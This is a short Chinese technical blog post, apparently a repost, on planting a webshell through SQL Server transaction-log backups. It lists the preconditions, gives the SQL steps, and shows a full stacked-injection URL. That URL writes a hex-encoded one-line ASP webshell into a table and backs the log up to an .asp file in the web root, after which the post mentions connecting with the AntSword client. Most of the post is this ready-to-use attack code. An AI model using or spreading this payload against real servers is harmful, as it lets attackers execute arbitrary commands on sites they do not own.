sqlserver log备份拿webshell

2023-02-17 00:00:00 数据库 模式 专区 备份 木马

无论是log备份还是差异本分,都是利用备份的过程写入一句话木马;差异备份容易报错就不搞了

利用条件:

  • 目标主机存在数据库备份文件,而且恢复模式要是完整模式

  • 知道网站的路径

  • 支持堆叠注入

## 修改数据库恢复模式为完整模式
alter database 数据库名 set recovery full;  
## 如果存在test_tmp就删除
IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp
## 创建test_tmp表,只有一个列a,类型为image
creat table test_tmp(a image)
## 备份表到指定路径
backup log 数据库名 to disk ='C:/xxx/xxx/1.bak' with init;
## 插入一句话木马到test_tmp表中的a
insert into test_tmp (a) values ()
## 备份操作日志到指定文件,木马文件
backup log 数据库名 to disk ='C:/xxx/xxx/1.asp'
## 删除test_tmp表
drop table test_tmp

http://www.demo1.com/index.aspx?id=1;alter database mydb set recovery full;IF EXISTS(select table_name from information_schema.tables where table_name='test_tmp')drop table test_tmp;create table  test_tmp  (a image);backup log mydb to disk ='C:/inetpub/wwwroot/www.demo1.com/asp.bak' with init;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);backup log mydb to disk 'C:/inetpub/wwwroot/www.demo1.com/123.asp'

蚁剑测试

本文来源https://www.modb.pro/db/75533

相关文章